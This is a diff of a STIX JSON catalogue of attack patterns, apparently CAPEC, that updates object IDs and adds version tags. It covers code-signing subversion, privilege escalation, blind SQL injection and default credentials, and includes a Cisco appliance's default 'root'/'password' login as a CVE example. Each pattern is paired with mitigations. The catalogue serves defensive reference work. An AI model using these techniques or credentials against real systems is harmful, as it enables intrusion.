"attack-pattern--1946dd88-8924-4fb5-a3a4-a3c4d7b7114b" + "target_ref": "attack-pattern--5376ae8c-a2da-4f87-941e-ccc030c8fdb1" }, { "name": "Subvert Code-signing Facilities", "description": "Many languages use code signing facilities to vouch for code's identity and to thus tie code to its assigned privileges within an environment. Subverting this mechanism can be instrumental in an attacker escalating privilege. Any means of subverting the way that a virtual machine enforces code signing classifies for this style of attack.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -40695,65 +41395,66 @@ "The ability to load unsigned code into the kernel of earlier versions of Vista and bypass integrity checking is an example of such subversion. In the proof-of-concept, it is possible to bypass the signature-checking mechanism Vista uses to load device drivers." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--62b16b4f-cf26-4bd7-a1b3-ef52b1063e34" + "id": "attack-pattern--4c20557e-86ee-4ba3-97e5-6cd0772e9356" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-68-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "A given code signing scheme may be fallible due to improper use of cryptography. Developers must never roll out their own cryptography, nor should existing primitives be modified or ignored.", "type": "course-of-action", - "id": "course-of-action--1695e92c-2c03-4674-a469-8fd5d9401172" + "id": "course-of-action--3868f5b2-2b41-4c78-957f-67972e41c9ec" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--c860d3eb-5f80-444b-895c-1f55c8a3f2e0", - "source_ref": "course-of-action--1695e92c-2c03-4674-a469-8fd5d9401172", + "id": "relationship--39f5e21d-6c4f-4738-9d0c-1fce0621d0a0", + "source_ref": "course-of-action--3868f5b2-2b41-4c78-957f-67972e41c9ec", "relationship_type": "mitigates", - "target_ref": "attack-pattern--62b16b4f-cf26-4bd7-a1b3-ef52b1063e34" + "target_ref": "attack-pattern--4c20557e-86ee-4ba3-97e5-6cd0772e9356" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-68-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "If an attacker cannot attack the scheme directly, he might try to alter the environment that affects the signing and verification processes. A possible mitigation is to avoid reliance on flags or environment variables that are user-controllable.", "type": "course-of-action", - "id": "course-of-action--a05441ff-4d47-4662-8a89-a05b316deba5" + "id": "course-of-action--cdc59f0e-dc48-4ca6-85c3-3cbe86191094" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--1113a6fd-2065-46ef-86d0-1821747a674e", - "source_ref": "course-of-action--a05441ff-4d47-4662-8a89-a05b316deba5", + "id": "relationship--dcdd89b0-3356-4eb7-abf5-64902536faa4", + "source_ref": "course-of-action--cdc59f0e-dc48-4ca6-85c3-3cbe86191094", "relationship_type": "mitigates", - "target_ref": "attack-pattern--62b16b4f-cf26-4bd7-a1b3-ef52b1063e34" + "target_ref": "attack-pattern--4c20557e-86ee-4ba3-97e5-6cd0772e9356" }, { "name": "Target Programs with Elevated Privileges", "description": "This attack targets programs running with elevated privileges. The attacker would try to leverage a bug in the running program and get arbitrary code to execute with elevated privileges. For instance an attacker would look for programs that write to the system directories or registry keys (such as HKLM, which stores a number of critical Windows environment variables). These programs are typically running with elevated privileges and have usually not been designed with security in mind. Such programs are excellent exploit targets because they yield lots of power when they break. The malicious user try to execute its code at the same level as a privileged system call.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -40820,265 +41521,266 @@ }, "x_capec_abstraction": "Standard", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--86e422f5-3818-4db9-b413-eddb00c75289" + "id": "attack-pattern--3104aa23-1c15-4c4c-9a97-3af74f5e3f67" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-69-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Apply the principle of least privilege.", "type": "course-of-action", - "id": "course-of-action--96d2899c-7a55-482e-a27b-c255fad47a8d" + "id": "course-of-action--6024a8f5-454d-4e16-9279-9075d9fc39cf" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--b729b9c9-9948-4e91-9bf0-aef52aedb014", - "source_ref": "course-of-action--96d2899c-7a55-482e-a27b-c255fad47a8d", + "id": "relationship--d391abd9-19e1-4e4a-a3c0-913173953fbc", + "source_ref": "course-of-action--6024a8f5-454d-4e16-9279-9075d9fc39cf", "relationship_type": "mitigates", - "target_ref": "attack-pattern--86e422f5-3818-4db9-b413-eddb00c75289" + "target_ref": "attack-pattern--3104aa23-1c15-4c4c-9a97-3af74f5e3f67" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-69-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Validate all untrusted data.", "type": "course-of-action", - "id": "course-of-action--cd9472a7-9928-40f5-976f-57253a04c1e8" + "id": "course-of-action--2491ddd6-61d6-4cbd-9641-8a5523b27f8d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--f2cd02de-45ef-43a0-9796-73659959f2d8", - "source_ref": "course-of-action--cd9472a7-9928-40f5-976f-57253a04c1e8", + "id": "relationship--8c21c97b-4442-4427-91f7-ed7820bde031", + "source_ref": "course-of-action--2491ddd6-61d6-4cbd-9641-8a5523b27f8d", "relationship_type": "mitigates", - "target_ref": "attack-pattern--86e422f5-3818-4db9-b413-eddb00c75289" + "target_ref": "attack-pattern--3104aa23-1c15-4c4c-9a97-3af74f5e3f67" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-69-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Apply the latest patches.", "type": "course-of-action", - "id": "course-of-action--99036d53-f41c-4ee0-bd7a-c4daa823b57c" + "id": "course-of-action--4d0336dc-c879-4610-bec0-033df2c9379a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--75bb9103-0b38-4f39-9cc0-e48abacd22e2", - "source_ref": "course-of-action--99036d53-f41c-4ee0-bd7a-c4daa823b57c", + "id": "relationship--7c2427c4-5e7c-48bc-b418-de45d3feb416", + "source_ref": "course-of-action--4d0336dc-c879-4610-bec0-033df2c9379a", "relationship_type": "mitigates", - "target_ref": "attack-pattern--86e422f5-3818-4db9-b413-eddb00c75289" + "target_ref": "attack-pattern--3104aa23-1c15-4c4c-9a97-3af74f5e3f67" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-69-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Scan your services and disable the ones which are not needed and are exposed unnecessarily. Exposing programs increases the attack surface. Only expose the services which are needed and have security mechanisms such as authentication built around them.", "type": "course-of-action", - "id": "course-of-action--855c8fc9-7021-495b-b00c-827d76609d44" + "id": "course-of-action--51b77eec-ff72-449d-850d-ed8bd19ca6b3" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--6e62ae53-7a0c-4fea-82cf-e300b579841f", - "source_ref": "course-of-action--855c8fc9-7021-495b-b00c-827d76609d44", + "id": "relationship--b5155ed4-8f92-4832-b65a-80ac64463a0a", + "source_ref": "course-of-action--51b77eec-ff72-449d-850d-ed8bd19ca6b3", "relationship_type": "mitigates", - "target_ref": "attack-pattern--86e422f5-3818-4db9-b413-eddb00c75289" + "target_ref": "attack-pattern--3104aa23-1c15-4c4c-9a97-3af74f5e3f67" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-69-4", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Avoid revealing information about your system (e.g., version of the program) to anonymous users.", "type": "course-of-action", - "id": "course-of-action--50b6934d-3063-443c-b00c-1b1386b9a1a8" + "id": "course-of-action--2169ecc1-a465-4c48-a073-853c776f16ee" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--0db4e11b-f11a-408d-b763-388d82961a0a", - "source_ref": "course-of-action--50b6934d-3063-443c-b00c-1b1386b9a1a8", + "id": "relationship--3ecdd1e5-d6b7-43ed-af41-31b29883030d", + "source_ref": "course-of-action--2169ecc1-a465-4c48-a073-853c776f16ee", "relationship_type": "mitigates", - "target_ref": "attack-pattern--86e422f5-3818-4db9-b413-eddb00c75289" + "target_ref": "attack-pattern--3104aa23-1c15-4c4c-9a97-3af74f5e3f67" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-69-5", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Make sure that your program or service fail safely. What happen if the communication protocol is interrupted suddenly? What happen if a parameter is missing? Does your system have resistance and resilience to attack? Fail safely when a resource exhaustion occurs.", "type": "course-of-action", - "id": "course-of-action--865b35dd-10b0-4cb2-9c9f-43d9005a4d1b" + "id": "course-of-action--10d32cb0-4883-4af3-b968-f1961bae95e9" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--1fa0fa88-12e5-4c88-a82a-6b9b664ac62c", - "source_ref": "course-of-action--865b35dd-10b0-4cb2-9c9f-43d9005a4d1b", + "id": "relationship--8a19cac6-1d9f-4cc4-8268-8b2724964e81", + "source_ref": "course-of-action--10d32cb0-4883-4af3-b968-f1961bae95e9", "relationship_type": "mitigates", - "target_ref": "attack-pattern--86e422f5-3818-4db9-b413-eddb00c75289" + "target_ref": "attack-pattern--3104aa23-1c15-4c4c-9a97-3af74f5e3f67" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-69-6", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "If possible use a sandbox model which limits the actions that programs can take. A sandbox restricts a program to a set of privileges and commands that make it difficult or impossible for the program to cause any damage.", "type": "course-of-action", - "id": "course-of-action--58697fd6-b9f9-4bbf-9be2-b8750486c687" + "id": "course-of-action--7757d6cb-1ca1-443a-acc2-0e56d96742ee" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--58b1c1b4-2f1a-49f5-9705-3c2e376a88cf", - "source_ref": "course-of-action--58697fd6-b9f9-4bbf-9be2-b8750486c687", + "id": "relationship--c337d703-18ca-4ed6-8c29-8ed9b62345c2", + "source_ref": "course-of-action--7757d6cb-1ca1-443a-acc2-0e56d96742ee", "relationship_type": "mitigates", - "target_ref": "attack-pattern--86e422f5-3818-4db9-b413-eddb00c75289" + "target_ref": "attack-pattern--3104aa23-1c15-4c4c-9a97-3af74f5e3f67" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-69-7", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Check your program for buffer overflow and format String vulnerabilities which can lead to execution of malicious code.", "type": "course-of-action", - "id": "course-of-action--5d219582-9fda-4930-9abb-62482ea7b864" + "id": "course-of-action--724cd67d-adc8-4f12-a881-cd350980aec9" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--5cccc72b-60a6-435d-b399-c6cff1444a83", - "source_ref": "course-of-action--5d219582-9fda-4930-9abb-62482ea7b864", + "id": "relationship--31c0ce8e-9d50-4d93-a92c-e57c243f2496", + "source_ref": "course-of-action--724cd67d-adc8-4f12-a881-cd350980aec9", "relationship_type": "mitigates", - "target_ref": "attack-pattern--86e422f5-3818-4db9-b413-eddb00c75289" + "target_ref": "attack-pattern--3104aa23-1c15-4c4c-9a97-3af74f5e3f67" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-69-8", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Monitor traffic and resource usage and pay attention if resource exhaustion occurs.", "type": "course-of-action", - "id": "course-of-action--41be94ce-aadc-4770-916f-04e0bf957a9e" + "id": "course-of-action--19636648-c6d0-40d4-abe6-b290bc6df849" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--46f4bc31-0170-42a5-b3fd-8a913b52b280", - "source_ref": "course-of-action--41be94ce-aadc-4770-916f-04e0bf957a9e", + "id": "relationship--516e70d6-117b-44cf-a856-6b06d88e15d1", + "source_ref": "course-of-action--19636648-c6d0-40d4-abe6-b290bc6df849", "relationship_type": "mitigates", - "target_ref": "attack-pattern--86e422f5-3818-4db9-b413-eddb00c75289" + "target_ref": "attack-pattern--3104aa23-1c15-4c4c-9a97-3af74f5e3f67" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-69-9", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Protect your log file from unauthorized modification and log forging.", "type": "course-of-action", - "id": "course-of-action--43a4cc91-254e-4dd5-a74d-7b3da1d140b7" + "id": "course-of-action--239b3766-bea2-4e5f-9e51-42ff425ebf16" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--f5426ea7-60fc-4e23-9bcc-50ba467d3d5e", - "source_ref": "course-of-action--43a4cc91-254e-4dd5-a74d-7b3da1d140b7", + "id": "relationship--53f66ea4-1e34-4a25-9b1c-2b1bf1f1fa96", + "source_ref": "course-of-action--239b3766-bea2-4e5f-9e51-42ff425ebf16", "relationship_type": "mitigates", - "target_ref": "attack-pattern--86e422f5-3818-4db9-b413-eddb00c75289" + "target_ref": "attack-pattern--3104aa23-1c15-4c4c-9a97-3af74f5e3f67" }, { "name": "Blind SQL Injection", "description": "Blind SQL Injection results from an insufficient mitigation for SQL Injection. Although suppressing database error messages are considered best practice, the suppression alone is not sufficient to prevent SQL Injection. Blind SQL Injection is a form of SQL Injection that overcomes the lack of error messages. Without the error messages that facilitate SQL Injection, the adversary constructs input strings that probe the target through simple Boolean SQL expressions. The adversary can determine if the syntax and structure of the injection was successful based on whether the query was executed or not. Applied iteratively, the adversary determines how and where the target is vulnerable to SQL Injection.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -41155,53 +41857,54 @@ "In the PHP application TimeSheet 1.1, an adversary can successfully retrieve username and password hashes from the database using Blind SQL Injection. If the adversary is aware of the local path structure, the adversary can also remotely execute arbitrary code and write the output of the injected queries to the local path. Blind SQL Injection is possible since the application does not properly sanitize the $_POST['username'] variable in the login.php file. See also: CVE-2006-4705" ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--12ea6657-5f7c-44f6-b340-451d7dbdadcc" + "id": "attack-pattern--ae26a24f-24e3-4a3d-a967-473bfbaac369" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-7-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Security by Obscurity is not a solution to preventing SQL Injection. Rather than suppress error messages and exceptions, the application must handle them gracefully, returning either a custom error page or redirecting the user to a default page, without revealing any information about the database or the application internals.", "type": "course-of-action", - "id": "course-of-action--32630e79-7364-4e6d-bc51-f7f86f37c082" + "id": "course-of-action--8afa62f1-9290-43b7-b133-9f3d1936db73" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--90a49232-e3cd-4e71-a2d6-817623116586", - "source_ref": "course-of-action--32630e79-7364-4e6d-bc51-f7f86f37c082", + "id": "relationship--5d78debf-8201-4100-b658-aaa763cd154e", + "source_ref": "course-of-action--8afa62f1-9290-43b7-b133-9f3d1936db73", "relationship_type": "mitigates", - "target_ref": "attack-pattern--12ea6657-5f7c-44f6-b340-451d7dbdadcc" + "target_ref": "attack-pattern--ae26a24f-24e3-4a3d-a967-473bfbaac369" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--077e6149-1c7b-4b6a-8c3f-28d138284fc1", - "source_ref": "course-of-action--32e3e6b3-f588-4d30-8aea-e1457dec060b", + "id": "relationship--1f89fa6a-7453-4013-a34f-689b973a23e3", + "source_ref": "course-of-action--b8c7d2ba-edaa-44e3-b9a2-64c34bd02f28", "relationship_type": "mitigates", - "target_ref": "attack-pattern--12ea6657-5f7c-44f6-b340-451d7dbdadcc" + "target_ref": "attack-pattern--ae26a24f-24e3-4a3d-a967-473bfbaac369" }, { "name": "Try Common or Default Usernames and Passwords", "description": "An adversary may try certain common or default usernames and passwords to gain access into the system and perform unauthorized actions. An adversary may try an intelligent brute force using empty passwords, known vendor default credentials, as well as a dictionary of common usernames and passwords. Many vendor products come preconfigured with default (and thus well-known) usernames and passwords that should be deleted prior to usage in a production environment. It is a common mistake to forget to remove these default login credentials. Another problem is that users would pick very simple (common) passwords (e.g. \"secret\" or \"password\") that make it easier for the attacker to gain access to the system compared to using a brute force attack or even a dictionary attack using a full dictionary.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", @@ -41265,79 +41968,80 @@ "Cisco 2700 Series Wireless Location Appliances (version 2.1.34.0 and earlier) have a default administrator username \"root\" with a password \"password\". This allows remote attackers to easily obtain administrative privileges. See also: CVE-2006-5288" ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--74222e4e-7b16-4b61-a9da-3b22a3411413" + "id": "attack-pattern--2372b712-3a94-46d5-86d4-67d489cdbf95" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-70-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Delete all default account credentials that may be put in by the product vendor.", "type": "course-of-action", - "id": "course-of-action--c385dece-8664-49bd-b465-b9767b24d2b0" + "id": "course-of-action--bda14fae-49f5-4ad2-a29e-764ae02120dd" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--3ae28e84-84b2-4378-bff0-25b41e63e2f1", - "source_ref": "course-of-action--c385dece-8664-49bd-b465-b9767b24d2b0", + "id": "relationship--0b670580-a2a8-40fc-907a-9ce3e92ae580", + "source_ref": "course-of-action--bda14fae-49f5-4ad2-a29e-764ae02120dd", "relationship_type": "mitigates", - "target_ref": "attack-pattern--74222e4e-7b16-4b61-a9da-3b22a3411413" + "target_ref": "attack-pattern--2372b712-3a94-46d5-86d4-67d489cdbf95" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--5aafca93-1380-4fe2-90cc-d45b6787f7b4", - "source_ref": "course-of-action--8f658271-e6da-4acf-ad8c-6fcd15fc85c8", + "id": "relationship--d530cdcd-aa63-45a6-9fae-a6fccd7611f5", + "source_ref": "course-of-action--a8b8e20b-4835-4d45-8d70-6e8217188238", "relationship_type": "mitigates", - "target_ref": "attack-pattern--74222e4e-7b16-4b61-a9da-3b22a3411413" + "target_ref": "attack-pattern--2372b712-3a94-46d5-86d4-67d489cdbf95" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": 